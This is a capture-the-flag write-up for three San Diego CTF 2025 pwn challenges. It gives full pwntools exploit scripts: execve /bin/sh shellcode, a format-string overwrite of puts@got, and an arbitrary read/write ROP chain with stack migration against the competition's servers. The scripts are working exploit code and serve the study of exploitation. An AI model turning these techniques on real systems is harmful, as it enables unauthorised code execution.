San Diego CTF 2025 - all pwn challenge

Author: 堇姬 Naup

Preface

This CTF play with Bing Chilling Academies
This CTF’s pwn is so easy, I just spend an hour and a half to solve all pwn challenge. But I still recorded it

We got rank 9.

Shellphone

It let you input shellcode (shellcode need to < 0x19 bytes). It will execute your shellcode.
Just use this shellcode can get flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

r = remote("52.8.15.62", 8006)

'''
  401000:	48 31 f6             	xor    %rsi,%rsi
  401003:	56                   	push   %rsi
  401004:	48 bf 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rdi
  40100b:	2f 73 68 
  40100e:	57                   	push   %rdi
  40100f:	54                   	push   %rsp
  401010:	5f                   	pop    %rdi
  401011:	6a 3b                	pushq  $0x3b
  401013:	58                   	pop    %rax
  401014:	99                   	cltd   
  401015:	0f 05                	syscall 
'''

sc = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

r.sendline(sc)

r.interactive()

sdctf{omg_i_luv_shlcd}

Gutenberg

Very simple format string vulnerability.
It give you win function

Use fmt overwrite puts@got and you will jump to win function. (You need to jump after *a1 == 5184)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

#r=process("./shop")
r = remote("52.8.15.62" ,8005)

debug = input("(Y/N)")
if debug == "Y" or debug == "y":
    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r)

flag = 0x4006a4 
puts_got = 0x601018
payload = b"%4196004c%10$lln".ljust(0x20, b"\x00") + p64(puts_got)
r.sendlineafter("Welcome to Ye Olde Printing Hous! Pray tell what you wish to have printed\n", payload)

r.interactive()

sdctf{printing_like_johannes}

ACM Cafe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>

void main_loop() {
	printf("Welcome to ACM Cafe!\n\n");

	int attempts = 5;
	char buffer[0x10];
	unsigned long addr, value;

	while (attempts > 0) {
		printf("What will you be ordering? ");
		fgets(buffer, sizeof(buffer), stdin);
		addr = strtoul(buffer, NULL, 16);
		printf("Oh! I just love 0x%lx, great pick!\n", *(unsigned long*)addr);

		printf("If you could go anywhere, where would you go? ");
		fgets(buffer, sizeof(buffer), stdin);
		addr = strtoul(buffer, NULL, 16);
		printf("What would you bring there? ");
		fgets(buffer, sizeof(buffer), stdin);
		value = strtoul(buffer, NULL, 16);
		*(unsigned long*)addr = value;
		printf("Hmm, that's not what I would have brought, but that's okay!");

		attempts--;
	}
}

int main() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	main_loop();
	puts("\nCome again soon!");
	return 0;
}

It give me five times arbitrary write and read.
It is 32bits binary and static linking.
When we look environ, environ have stack address.
So use aaw leak stack address.

We can use stack migration.
I use ROP like this.
It will set :

  • eax - 0xb
  • ebx - /bin/sh address
  • ecx - 0
  • edx - 0
1
2
3
4
5
6
7
8
9
10
11
pop eax ; ret
rop_empty
mov edx, dword ptr [eax] ; mov eax, edx ; ret
pop eax ; ret
0
0x0809c028 : mov ecx, eax ; mov eax, ecx ; ret
pop eax ; ret
0xb
pop ebx ; ret
binsh
int 0x80

I write it on bss, and use leave; ret gadget mov rsp to my ROP gadget.
We can also overwrite return address to main_loop, getting more chance to write gadget on bss.

More detail go to read my script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
from pwn import *

r = process("./chal")

r = remote("52.8.15.62" ,8009)

debug = input("(Y/N)")
if debug == "Y" or debug == "y":
    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r)

def aaw(addr, value):
    r.sendlineafter(b"If you could go anywhere, where would you go? ", hex(addr))
    r.sendlineafter(b"What would you bring there? ", hex(value).encode())

## 1
environ = 0x80f1b44
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
r.recvuntil(b"Oh! I just love ")
leak = r.recvline().strip().split(b",")[0]
leakstack = int(leak, 16)

retaddr = leakstack - 352
main_loop = 0x80497f5
binsh = 0x80f2a00
rop = 0x80f2700
rop_empty = 0x80f2200
'''
0x080b480a : pop eax ; ret
0x08049022 : pop ebx ; ret
0x0809c028 : mov ecx, eax ; mov eax, ecx ; ret
0x0807a0df : mov edx, dword ptr [eax] ; mov eax, edx ; ret
0x08049d5a : int 0x80
0x080b47ba : pop esp ; ret
0x08049009 : ret
0x08049705 : leave ; ret

pop eax ; ret
rop_empty
mov edx, dword ptr [eax] ; mov eax, edx ; ret
pop eax ; ret
0
0x0809c028 : mov ecx, eax ; mov eax, ecx ; ret
pop eax ; ret
0xb
pop ebx ; ret
binsh
int 0x80
'''

pop_eax = 0x080b480a
pop_ebx = 0x08049022
mov_eax_to_ecx = 0x0809c028
mov_ptr_eax_to_edx = 0x0807a0df
int80 = 0x08049d5a 
pop_esp = 0x080b47ba 
ret = 0x08049009 
leaveret = 0x08049705

binsh2 = 0x68732f
binsh1 = 0x6e69622f


aaw(binsh, binsh1)

## 2
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())

aaw(binsh + 0x4, binsh2)

## 3
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())

aaw(retaddr, main_loop)

## 4
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop, pop_eax)

## 5
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop + 4, rop_empty)

## 6
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop + 8, mov_ptr_eax_to_edx)

## 7
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop + 12, pop_eax)

## 8
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop + 16, 0)

## 9
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop + 20, mov_eax_to_ecx)

## 10
retaddr2 = leakstack - 348
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr2, main_loop)

## 11 
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop+24, pop_eax)

## 12
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop+28, 0xb)

## 13
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop+32, pop_ebx)

## 14
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop+36, binsh)

## 15
retaddr3 = leakstack - 344
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr3, main_loop)

## 16
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(rop+40, int80)

retaddr4 = leakstack - 340

## 17
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr4 - 0x4, rop - 0x4)

## 18
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr4, leaveret)

## 19
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr4, leaveret)

## 20
r.sendlineafter(b"What will you be ordering? ", hex(environ).encode())
aaw(retaddr4, leaveret)

print("[+] LEAKSTACK : ", hex(leakstack))
print("[+] RETADDR : ", hex(retaddr))
print("[+] BINSH : ", hex(binsh))


r.interactive()

sdctf{th1s_challenge_f3lt_a_b1t_arbitr4ry}

after all

Need to more difficult pwn challenge…
Thanks all Bing Chilling Academies members.